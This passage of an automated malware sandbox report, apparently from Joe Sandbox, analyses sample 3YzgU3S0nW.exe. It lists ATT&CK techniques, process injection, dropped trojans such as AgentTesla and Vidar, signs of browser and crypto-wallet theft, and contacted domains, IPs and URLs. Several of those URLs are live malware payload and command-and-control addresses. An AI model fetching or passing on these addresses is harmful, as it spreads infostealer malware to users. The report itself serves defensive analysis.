                      Spearphishing Link1Windows Management Instrumentation221DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools111OS Credential Dumping1System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer14Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Valid Accounts1Native API11Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information11Input Capture1Account Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel21Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsExploitation for Client Execution1Valid Accounts1Valid Accounts1Obfuscated Files or Information3Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesInput Capture1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsCommand and Scripting Interpreter2Windows Service4Access Token Manipulation1Software Packing33NTDSSystem Information Discovery148Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol4SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsService Execution3Network Logon ScriptWindows Service4Timestomp1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol25Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonProcess Injection513DLL Side-Loading1Cached Domain CredentialsSecurity Software Discovery771VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncProcess Discovery12Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading31Proc FilesystemVirtualization/Sandbox Evasion351Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Valid Accounts1/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Access Token Manipulation1Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronVirtualization/Sandbox Evasion351Input CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchdProcess Injection513KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                      Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled TaskHidden Files and Directories1GUI Input CaptureDomain GroupsExploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 546826 Sample: 3YzgU3S0nW.exe Startdate: 31/12/2021 Architecture: WINDOWS Score: 100 94 t.me 2->94 124 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->124 126 Antivirus detection for URL or domain 2->126 128 Antivirus detection for dropped file 2->128 130 12 other signatures 2->130 11 3YzgU3S0nW.exe 2->11         started        13 ahtdegs 2->13         started        16 svchost.exe 2->16         started        18 10 other processes 2->18 signatures3 process4 signatures5 20 3YzgU3S0nW.exe 11->20         started        140 Multi AV Scanner detection for dropped file 13->140 142 Machine Learning detection for dropped file 13->142 23 ahtdegs 13->23         started        144 Changes security center settings (notifications, updates, antivirus, firewall) 16->144 25 MpCmdRun.exe 16->25         started        process6 signatures7 132 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 20->132 134 Maps a DLL or memory area into another process 20->134 136 Checks if the current machine is a virtual machine (disk enumeration) 20->136 138 Creates a thread in another existing process (thread injection) 20->138 27 explorer.exe 10 20->27 injected 32 conhost.exe 25->32         started        process8 dnsIp9 98 185.233.81.115, 443, 49759 SUPERSERVERSDATACENTERRU Russian Federation 27->98 100 188.166.28.199, 80 DIGITALOCEAN-ASNUS Netherlands 27->100 102 14 other IPs or domains 27->102 84 C:\Users\user\AppData\Roaming\ahtdegs, PE32 27->84 dropped 86 C:\Users\user\AppData\Local\Temp\F338.exe, PE32 27->86 dropped 88 C:\Users\user\AppData\Local\Temp\9355.exe, PE32 27->88 dropped 90 6 other files (5 malicious) 27->90 dropped 146 System process connects to network (likely due to code injection or exploit) 27->146 148 Benign windows process drops PE files 27->148 150 Deletes itself after installation 27->150 152 Hides that the sample has been downloaded from the Internet (zone.identifier) 27->152 34 7085.exe 27->34         started        37 9355.exe 27->37         started        39 8132.exe 127 27->39         started        43 8A8A.exe 2 27->43         started        file10 signatures11 process12 dnsIp13 104 Multi AV Scanner detection for dropped file 34->104 106 Machine Learning detection for dropped file 34->106 108 Contains functionality to inject code into remote processes 34->108 45 7085.exe 34->45         started        110 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 37->110 112 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 37->112 114 Injects a PE file into a foreign processes 37->114 48 9355.exe 37->48         started        51 9355.exe 37->51         started        96 file-file-host4.com 39->96 78 C:\Users\user\AppData\...\sqlite3[1].dll, PE32 39->78 dropped 80 C:\ProgramData\sqlite3.dll, PE32 39->80 dropped 116 Detected unpacking (changes PE section rights) 39->116 118 Detected unpacking (overwrites its own PE header) 39->118 120 Tries to harvest and steal browser information (history, passwords, etc) 39->120 122 2 other signatures 39->122 53 cmd.exe 39->53         started        82 C:\Users\user\AppData\Local\...\atingifo.exe, PE32 43->82 dropped 55 cmd.exe 43->55         started        58 cmd.exe 43->58         started        60 sc.exe 43->60         started        62 sc.exe 43->62         started        file14 signatures15 process16 dnsIp17 154 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 45->154 156 Maps a DLL or memory area into another process 45->156 158 Checks if the current machine is a virtual machine (disk enumeration) 45->158 160 Creates a thread in another existing process (thread injection) 45->160 92 86.107.197.138, 38133, 49844 MOD-EUNL Romania 48->92 162 Tries to harvest and steal browser information (history, passwords, etc) 48->162 164 Tries to steal Crypto Currency Wallets 48->164 64 conhost.exe 53->64         started        66 timeout.exe 53->66         started        76 C:\Windows\SysWOW64\...\atingifo.exe (copy), PE32 55->76 dropped 68 conhost.exe 55->68         started        70 conhost.exe 58->70         started        72 conhost.exe 60->72         started        74 conhost.exe 62->74         started        file18 signatures19 process20

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      3YzgU3S0nW.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\atingifo.exe100%AviraTR/Crypt.XPACK.Gen
                      C:\Users\user\AppData\Local\Temp\F338.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\ahtdegs100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\9355.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\atingifo.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\8A8A.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\7085.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\8132.exe100%Joe Sandbox ML
                      C:\ProgramData\sqlite3.dll3%MetadefenderBrowse
                      C:\ProgramData\sqlite3.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\sqlite3[1].dll3%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\sqlite3[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\7085.exe44%ReversingLabsWin32.Packed.Generic
                      C:\Users\user\AppData\Local\Temp\9355.exe63%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      C:\Users\user\AppData\Local\Temp\F338.exe42%ReversingLabsWin32.Trojan.Generic
                      C:\Users\user\AppData\Local\Temp\FFBD.exe44%ReversingLabsWin32.Trojan.Vidar
                      C:\Users\user\AppData\Roaming\ahtdegs44%ReversingLabsWin32.Packed.Generic

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      15.2.ahtdegs.8715a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.2.3YzgU3S0nW.exe.8715a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      23.2.8A8A.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                      22.2.8132.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      22.2.8132.exe.790e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      17.0.7085.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      22.3.8132.exe.7b0000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                      2.1.3YzgU3S0nW.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      17.1.7085.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.0.3YzgU3S0nW.exe.400000.0.unpack100%AviraHEUR/AGEN.1126869Download File
                      23.3.8A8A.exe.880000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                      16.2.7085.exe.7915a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      18.0.ahtdegs.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      18.1.ahtdegs.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.0.3YzgU3S0nW.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.0.3YzgU3S0nW.exe.400000.1.unpack100%AviraHEUR/AGEN.1126869Download File
                      2.0.3YzgU3S0nW.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      17.0.7085.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      18.0.ahtdegs.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      18.0.ahtdegs.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      17.2.7085.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      18.2.ahtdegs.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      23.2.8A8A.exe.860e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      2.0.3YzgU3S0nW.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.0.3YzgU3S0nW.exe.400000.2.unpack100%AviraHEUR/AGEN.1126869Download File
                      2.2.3YzgU3S0nW.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.0.3YzgU3S0nW.exe.400000.3.unpack100%AviraHEUR/AGEN.1126869Download File
                      17.0.7085.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                      http://185.7.214.171:8080/6.php100%URL Reputationmalware
                      https://dodecoin.org/dogewallet-setup.exe0%Avira URL Cloudsafe
                      http://tempuri.org/0%URL Reputationsafe
                      http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                      http://data-host-coin-8.com/files/6976_1640974830_4226.exe0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                      https://api.ip.sb/ip0%URL Reputationsafe
                      http://tempuri.org/Entity/Id24Response0%URL Reputationsafe
                      http://data-host-coin-8.com/files/5376_1640094939_1074.exe0%Avira URL Cloudsafe
                      https://dynamic.t0%URL Reputationsafe
                      http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
                      http://privacytools-foryou-777.com/downloads/toolspab2.exe100%Avira URL Cloudmalware
                      http://data-host-coin-8.com/game.exe100%Avira URL Cloudmalware
                      http://tempuri.org/Entity/Id13Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id19ResponseX0%Avira URL Cloudsafe
                      http://file-file-host4.com/sqlite3.dll0%URL Reputationsafe
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      https://get.adob0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      unicupload.top
                      54.38.220.85
                      truefalse
                        high
                        dodecoin.org
                        164.132.207.80
                        truefalse
                          high
                          host-data-coin-11.com
                          31.28.27.130
                          truefalse
                            high
                            bit.ly
                            67.199.248.10
                            truefalse
                              high
                              bitly.com
                              67.199.248.15
                              truefalse
                                high
                                t.me
                                149.154.167.99
                                truefalse
                                  high
                                  cdn.discordapp.com
                                  162.159.133.233
                                  truefalse
                                    high
                                    transfer.sh
                                    144.76.136.153
                                    truefalse
                                      high
                                      privacytools-foryou-777.com
                                      31.28.27.130
                                      truefalse
                                        high
                                        file-file-host4.com
                                        31.28.27.130
                                        truefalse
                                          high
                                          short.link
                                          104.21.41.11
                                          truefalse
                                            high
                                            data-host-coin-8.com
                                            31.28.27.130
                                            truefalse
                                              high

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://185.7.214.171:8080/6.phptrue
                                              • URL Reputation: malware
                                              unknown
                                              https://dodecoin.org/dogewallet-setup.exefalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://data-host-coin-8.com/files/6976_1640974830_4226.exefalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://bit.ly/3eHgQQRfalse
                                                high
                                                http://data-host-coin-8.com/files/5376_1640094939_1074.exefalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://transfer.sh/%28/8V4TRR/q.exe%29.zipfalse
                                                  high
                                                  https://cdn.discordapp.com/attachments/916319571638620172/925647741571452938/Pyroxylic.exefalse
                                                    high
                                                    http://privacytools-foryou-777.com/downloads/toolspab2.exetrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://data-host-coin-8.com/game.exetrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://file-file-host4.com/sqlite3.dllfalse
                                                    • URL Reputation: safe
                                                    unknown

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://schemas.xmlsoap.org/ws/2005/02/sc/sct9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                        high
                                                        https://duckduckgo.com/chrome_newtab9355.exe, 0000002B.00000002.528371871.00000000036E9000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528144568.0000000003628000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527734138.00000000034C0000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527653077.00000000034AA000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527420817.00000000033E9000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528939664.0000000004333000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528455460.00000000036FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000003.522708419.000000000454A000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmp, AI58QQIW.22.drfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                            high
                                                            https://duckduckgo.com/ac/?q=9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmp, AI58QQIW.22.drfalse
                                                              high
                                                              http://tempuri.org/Entity/Id12Response9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 00000007.00000003.307492636.000002488165A000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.308050352.000002488165C000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://tempuri.org/9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://tempuri.org/Entity/Id2Response9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha19355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://tempuri.org/Entity/Id21Response9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        https://support.google.com/chrome/?p=plugin_real9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/fault9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    http://tempuri.org/Entity/Id15Response9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            https://api.ip.sb/ip9355.exe, 00000018.00000002.448461054.0000000003591000.00000004.00000001.sdmp, 9355.exe, 00000018.00000002.448220318.0000000003421000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000000.443464761.0000000000402000.00000040.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmp, AI58QQIW.22.drfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA19355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://tempuri.org/Entity/Id24Response9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000007.00000003.307401992.0000024881662000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressing9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          https://dynamic.tsvchost.exe, 00000007.00000003.307429419.0000024881648000.00000004.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://support.google.com/chrome/?p=plugin_shockwave9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000007.00000003.307401992.0000024881662000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://tempuri.org/Entity/Id5Response9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000007.00000003.307492636.000002488165A000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.308050352.000002488165C000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000007.00000003.307492636.000002488165A000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://tempuri.org/Entity/Id10Response9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/Renew9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://tempuri.org/Entity/Id8Response9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://support.google.com/chrome/?p=plugin_wmp9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000007.00000003.307401992.0000024881662000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2006/02/addressingidentity9355.exe, 0000002B.00000002.527138373.00000000032D0000.00000004.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://support.google.com/chrome/?p=plugin_java9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/06/addressingex9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000007.00000003.285559324.0000024881631000.00000004.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ15109355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://support.google.com/chrome/?p=plugin_divx9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://tempuri.org/Entity/Id13Response9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpfalse
                                                                                                                                                                high
